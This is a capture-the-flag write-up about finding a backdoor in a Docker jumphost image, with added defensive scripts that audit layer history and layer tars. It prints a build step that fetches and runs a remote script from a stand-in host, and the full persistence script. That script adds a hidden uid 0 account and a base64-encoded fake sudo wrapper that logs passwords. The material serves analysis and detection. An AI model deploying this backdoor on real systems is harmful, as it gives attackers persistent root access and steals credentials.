Backdoored Image (Smart Airspace, 200p)

Developers have noticed that the latest version of an SSH jumphost which they are using for remote access is acting weirdly.
When inspecting logs, they notice logins from strange accounts that should not be there.
Their own dev account password also seems to be compromised, as logins are coming from unknown IP addresses. Sysadmins have recreated the jumphost container from the latest image but with no luck.
The same activity is still seen. Could the Docker repository be hacked? Could the hackers have tampered with the image? You must find out!
What flag is stored in the backdoor? Pull the jumphost image from docker.io/cybexer/ctf-jumphost:latest and find out how the image was compromised.

Solution

Download the Docker image.

# docker pull docker.io/cybexer/ctf-jumphost:latest
latest: Pulling from cybexer/ctf-jumphost
feac53061382: Pull complete
1aecb0ff55c4: Pull complete
b860e54873fb: Pull complete
d7f08af3407c: Pull complete
b545272ae0e8: Pull complete
3f2b81d958ec: Pull complete
45d84a5f7aa7: Pull complete
92e6070787b9: Pull complete
Digest: sha256:6e8ef7a9c23b0f983fba1d65a2592e86abe38aa23e72f9feb1b8ca01c3c60c30
Status: Downloaded newer image for cybexer/ctf-jumphost:latest
docker.io/cybexer/ctf-jumphost:latest

Running a container from the image and looking through its filesystem turned up nothing interesting, so take a look at the image's build history instead. Every RUN, COPY and ADD step is recorded there, newest layer first.

# docker history --no-trunc cybexer/ctf-jumphost
IMAGE                                                                     CREATED         CREATED BY 
sha256:8832240282b04f5b02515d5f54e86d0f4a4d74b8f88b277a17766c57d6d49b47   13 months ago   /bin/sh -c #(nop)  CMD ["supervisord" "-c" "/etc/supervisor.conf"] 
<missing>                                                                 13 months ago   /bin/sh -c apt-get clean && rm -rf /var/lib/apt/lists/* 
<missing>                                                                 13 months ago   /bin/sh -c rm persistence.sh
<missing>                                                                 13 months ago   /bin/sh -c echo "172.17.0.1 attack.er" >> /etc/hosts ; wget http://attack.er/persistence.sh && chmod +x persistence.sh && bash persistence.sh
<missing>                                                                 13 months ago   /bin/sh -c echo "devs:kitten123" | chpasswd
<missing>                                                                 13 months ago   /bin/sh -c useradd -ms /bin/bash devs
<missing>                                                                 13 months ago   /bin/sh -c #(nop) COPY file:51921e8d24bb5ab190e183439cdc7e033d6d1cfd9e234835e7b9f6c31753dec7 in /etc/ 
<missing>                                                                 13 months ago   /bin/sh -c mkdir -p /var/log/supervisor && mkdir -p /etc/supervisor/conf.d
<missing>                                                                 13 months ago   /bin/sh -c apt-get -y update && apt-get -y install vim     net-tools     openssh-server     nano     wget     sudo     coreutils     supervisor
<missing>                                                                 13 months ago   /bin/sh -c #(nop)  ENV DEBIAN_FRONTEND=noninteractive TZ=Europe/Tallinn
<missing>                                                                 14 months ago   /bin/sh -c #(nop)  CMD ["bash"]
<missing>                                                                 14 months ago   /bin/sh -c #(nop) ADD file:e729fb032bd2f7cde20fb343da0cd358447e8b23028422c123944e8d0be660fa in / 
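The history above already tells the story once you read it bottom-up: a remote script is fetched from a host that was first pinned in /etc/hosts, executed with bash, and then removed. Reviewing such output by hand does not scale, so below is an added example (not part of the original writeup) that applies a few detection heuristics to the CREATED BY column. It assumes the classic builder's "/bin/sh -c" command format as printed by docker history --no-trunc --format '{{.CreatedBy}}'; the sample input is constructed from the history shown above, and the rule names and regexes are this example's own choices, to be tuned for your base images.

```python
"""Flag suspicious build steps in a Docker image's layer history.

Added example for this writeup, not part of the original solution. Input is
the 'CREATED BY' column of the classic builder, as printed by
    docker history --no-trunc --format '{{.CreatedBy}}' IMAGE
(newest layer first). The sample below is constructed from the history the
writeup shows for cybexer/ctf-jumphost; the detection rules are heuristics
chosen for this example and should be tuned for your own base images.
"""
import re

# Each rule: (finding name, regex applied to the normalized shell command).
RULES = [
    ("remote script fetched and executed",
     re.compile(r"\b(wget|curl)\b[^;|]*(\|\s*(ba)?sh\b|&&\s*((ba)?sh\b|\./))")),
    ("credential set during build", re.compile(r"\b(chpasswd|passwd)\b")),
    ("duplicate uid 0 account",
     re.compile(r"\buseradd\b.*(-ou\s*0\b|-u\s*0\b.*-o\b|-o\b.*-u\s*0\b)")),
    ("/etc/hosts modified", re.compile(r">>?\s*/etc/hosts\b")),
    ("shell rc file modified",
     re.compile(r">>?\s*\S*\.(bashrc|profile|bash_profile|zshrc)\b")),
    ("script removed after use", re.compile(r"\brm\b[^;&|]*\.sh\b")),
]

# Constructed from the writeup's 'docker history' output, newest layer first.
SAMPLE_HISTORY = [
    '/bin/sh -c #(nop)  CMD ["supervisord" "-c" "/etc/supervisor.conf"]',
    '/bin/sh -c apt-get clean && rm -rf /var/lib/apt/lists/*',
    '/bin/sh -c rm persistence.sh',
    '/bin/sh -c echo "172.17.0.1 attack.er" >> /etc/hosts ; wget http://attack.er/persistence.sh && chmod +x persistence.sh && bash persistence.sh',
    '/bin/sh -c echo "devs:kitten123" | chpasswd',
    '/bin/sh -c useradd -ms /bin/bash devs',
    '/bin/sh -c #(nop) COPY file:51921e8d24bb5ab190e183439cdc7e033d6d1cfd9e234835e7b9f6c31753dec7 in /etc/',
    '/bin/sh -c mkdir -p /var/log/supervisor && mkdir -p /etc/supervisor/conf.d',
    '/bin/sh -c apt-get -y update && apt-get -y install vim net-tools openssh-server nano wget sudo coreutils supervisor',
    '/bin/sh -c #(nop)  ENV DEBIAN_FRONTEND=noninteractive TZ=Europe/Tallinn',
    '/bin/sh -c #(nop)  CMD ["bash"]',
    '/bin/sh -c #(nop) ADD file:e729fb032bd2f7cde20fb343da0cd358447e8b23028422c123944e8d0be660fa in /',
]


def normalize(created_by):
    """Strip the '/bin/sh -c ' wrapper and the '#(nop)' metadata marker."""
    cmd = created_by.strip()
    cmd = re.sub(r"^/bin/sh -c\s+", "", cmd)
    cmd = re.sub(r"^#\(nop\)\s+", "", cmd)
    return cmd


def audit_history(created_by_lines):
    """Return (build_step, finding, command) tuples in build order.

    docker history prints the newest layer first, so the lines are reversed
    to recover Dockerfile order; build_step is 1-based.
    """
    steps = [normalize(line) for line in reversed(created_by_lines) if line.strip()]
    findings = []
    for step, cmd in enumerate(steps, 1):
        for name, pattern in RULES:
            if pattern.search(cmd):
                findings.append((step, name, cmd))
    return findings


if __name__ == "__main__":
    for step, name, cmd in audit_history(SAMPLE_HISTORY):
        print(f"step {step:2d}: {name}\n         {cmd}")
```

On the sample history this reports step 8 (password set with chpasswd), step 9 twice (/etc/hosts modified, remote script executed) and step 10 (the script deleted afterwards), which is exactly the sequence a reviewer should question before trusting the image. A rule hit is a prompt to look at the layer, not proof of compromise: base images legitimately run apt-get and create service accounts.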

The interesting file is persistence.sh. The build step fetched it from attack.er, executed it and then removed it, so it is gone from the final filesystem but still present in the image's layers. Find and review it in the Docker layer storage on the host; it contains the flag.

# find /var/lib/docker -name persistence.sh
/var/lib/docker/overlay2/0b4ad13d11e18ca5d30429bc149573fc3f34101e5d79371c7d177aa6190d5035/diff/persistence.sh
/var/lib/docker/overlay2/2ca3e2aed23ad6d6293c469880a1d847740a5cd44c1ad2e2bcba23c1197f18f7/diff/persistence.sh
# cat /var/lib/docker/overlay2/0b4ad13d11e18ca5d30429bc149573fc3f34101e5d79371c7d177aa6190d5035/diff/persistence.sh
#!/bin/bash

# Planting persistence

###############################################
# FLAG = d4da58b6-d572-4992-8342-7747969911d5 #
###############################################

useradd -ou 0 -g 0 systemservice
echo "systemservice:backdoorpass1" | chpasswd

mkdir /home/devs/.hidden

echo "IyBGbGFnIGlzIG5vdCBoZXJlIDooCgpyZWFkIC1zcCAiW3N1ZG9dIHBhc3N3b3JkIGZvciAkVVNF
UjogIiBzdWRvcGFzcwplY2hvICIiCnNsZWVwIDIKZWNobyAiU29ycnksIHRyeSBhZ2Fpbi4iCmVj
aG8gJHN1ZG9wYXNzID4+IC90bXAvcGFzcy50eHQKCi91c3IvYmluL3N1ZG8gJEAK" | base64 -d > /home/devs/.hidden/fsudo

chmod a+x /home/devs/.hidden/fsudo
echo "alias sudo=~/.hidden/fsudo" >> /home/devs/.bashrc

The flag is d4da58b6-d572-4992-8342-7747969911d5. Beyond the flag, the script shows how the image was compromised: it adds a second uid 0 account (systemservice) with a fixed password, and appends an alias to the devs user's .bashrc so that sudo resolves to a hidden wrapper script in ~/.hidden instead of /usr/bin/sudo.
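The writeup located the script by searching the host's /var/lib/docker, which requires root on the Docker host. The same indicators that persistence.sh plants (a duplicate uid 0 account in /etc/passwd, a sudo alias in a shell rc file, an executable hidden in a dot-directory under a home) can be checked statically from the image layers themselves. The following added example, not part of the original writeup, scans one layer tar for those three indicators without running the container. It assumes the layer tar layout produced by docker save (paths relative to /, no leading slash); the layer scanned here is constructed in memory from the indicators seen in the script above, with a placeholder body for the wrapper file.

```python
"""Scan an image layer tar for persistence indicators without running it.

Added example, not part of the original writeup. It assumes the per-layer tar
layout that 'docker save' produces (entry names relative to /, e.g.
'etc/passwd'). The sample layer is constructed in memory from the indicators
the writeup's persistence.sh plants; the wrapper body is a placeholder.
"""
import io
import re
import tarfile

# Lines in a shell rc file that redefine privileged commands (alias, function).
OVERRIDE_RE = re.compile(
    r"^\s*(alias\s+(sudo|su|ssh|passwd)=|(sudo|su|ssh)\s*\(\)|function\s+(sudo|su|ssh)\b)"
)
RC_FILE_RE = re.compile(r"(^|/)\.(bashrc|profile|bash_profile|zshrc)$")
HIDDEN_HOME_RE = re.compile(r"^home/[^/]+/\.[^/]+/")


def extra_uid0_accounts(passwd_text):
    """Account names with uid 0 other than root (duplicate-root backdoor)."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7:
            continue  # not a valid passwd(5) record
        name, uid = fields[0], fields[2]
        if uid == "0" and name != "root":
            found.append(name)
    return found


def shell_rc_overrides(rc_text):
    """Stripped rc-file lines that alias or redefine sudo/su/ssh/passwd."""
    return [line.strip() for line in rc_text.splitlines() if OVERRIDE_RE.search(line)]


def scan_layer(tar_bytes):
    """Return a report dict for one layer tar given as bytes."""
    report = {"extra_uid0": [], "rc_overrides": [], "hidden_executables": []}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            if member.name == "etc/passwd":
                text = tar.extractfile(member).read().decode()
                report["extra_uid0"] += extra_uid0_accounts(text)
            elif RC_FILE_RE.search(member.name):
                text = tar.extractfile(member).read().decode()
                report["rc_overrides"] += [(member.name, l) for l in shell_rc_overrides(text)]
            # Executable regular file inside a dot-directory of a user's home.
            if member.mode & 0o111 and HIDDEN_HOME_RE.search(member.name):
                report["hidden_executables"].append(member.name)
    return report


def build_sample_layer():
    """Constructed layer tar mirroring what persistence.sh leaves behind."""
    files = {
        "etc/passwd": ("root:x:0:0:root:/root:/bin/bash\n"
                       "devs:x:1000:1000::/home/devs:/bin/bash\n"
                       "systemservice:x:0:0::/home/systemservice:/bin/bash\n", 0o644),
        "home/devs/.bashrc": ("# ~/.bashrc\nalias ll='ls -l'\n"
                              "alias sudo=~/.hidden/fsudo\n", 0o644),
        "home/devs/.hidden/fsudo": ("#!/bin/bash\n# placeholder body\n", 0o755),
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, (content, mode) in files.items():
            data = content.encode()
            info = tarfile.TarInfo(name)
            info.size = len(data)
            info.mode = mode
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


if __name__ == "__main__":
    for key, hits in scan_layer(build_sample_layer()).items():
        print(f"{key}: {hits}")
```

Running it over every layer of a real docker save export (each layer's tar fed to scan_layer) gives the same answer the writeup reached through overlay2, and also catches the case the challenge describes: an image that keeps behaving badly after the container is rebuilt, because the persistence lives in the image, not the container.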
